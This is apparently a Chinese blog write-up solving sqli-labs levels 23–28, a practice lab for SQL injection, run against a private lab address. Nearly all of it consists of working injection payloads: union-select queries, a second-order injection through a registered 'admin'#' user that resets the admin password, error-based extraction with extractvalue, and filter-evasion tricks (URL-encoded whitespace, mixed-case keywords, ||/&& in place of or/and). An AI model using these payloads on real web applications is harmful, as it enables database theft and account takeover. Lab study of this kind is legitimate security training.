【20171101早】sqli-libs Less 23-28

 

  Less 23：

　　题目：

　　分析：payload:http://192.168.162.135/sqli-libs/Less-23/?id=-1' union select 1, @@version, 3--+ 失败，应该是对--+进行了过滤，因此修改为

　　　　payload:http://192.168.162.135/sqli-libs/Less-23/?id=-1' union select 1, @@version, '3　　去掉--+，改成 '3 进行闭合sql中的 '

  Less 24：

　　题目：

　　分析：存储型注入，先将admin'#用户insert 数据库中，然后在重新更新admin的密码，就将

　　TRY：

　　　　s1：点击New User click here，注册 admin'# 用户，密码是222

　　　　s2：查看下数据库，admin'#已经存在

　　　　s3：登陆系统，修改admin的密码为111

　　　　

　　　　s4：查看到底修改的是admin'#用户的密码，还是admin的密码？！！！

　　修改的是admin的密码，这样我们就可以用admin登陆系统了。OK！

  Less 25：

　　题目：

　　分析：对 and 和 or 的过滤，这时用到的是替换

　　　　add <=> &&

　　　　or    <=> ||

　　TRY：

　　　　payload: http://192.168.162.135/sqli-libs/Less-25/?id=1' || extractvalue(1, concat(0x7e, database()))--+

　　效果：错误日志中暴露出数据库的名字，其他信息类似此方式！

  Less 25a：

　　分析：和Less 25不同的是闭合方式，不需要加 '

　　TRY:

　　　　payload: http://192.168.162.135/sqli-libs/Less-25a/?id=-1 union select 1,@@version,3--+

　Less 26:

　　题目：

　　分析：空格和注释会被过滤，这里用到替换的技巧。URL编码表

　　　　

　　TRY：

　　　　payload: http://192.168.162.135/sqli-libs/Less-26/?id=100' union%0bselect%a01,@@version,3||'1

　　效果：

 

  Less 26a：

　　类似 Less 26，闭合方式变为 ')

　　payload: http://192.168.162.135/sqli-libs/Less-26a/?id=100') union%0bselect%a01,@@version,3||('1

　　

  Less 27：

　　题目：

　　分析：union，select字符和less26中的字符都被过滤，这题可以将union改成uNioN，select改成sElEct

　　TRY：

　　　　payload: http://192.168.162.135/sqli-libs/Less-27/?id=100' uNioN%0bsElEct%a01,user(),3||'1

　　效果：

  Less 27a：

　　分析：闭合方式变为 "

　　payload: http://192.168.162.135/sqli-libs/Less-27a/?id=100" uNioN%0bsElEct%a01,user(),3||"1

  Less 28:

　　分析：闭合方式变为 ')

　　payload: http://192.168.162.135/sqli-libs/Less-28/?id=100') uNioN%0bsElEct%a01,user(),3||('1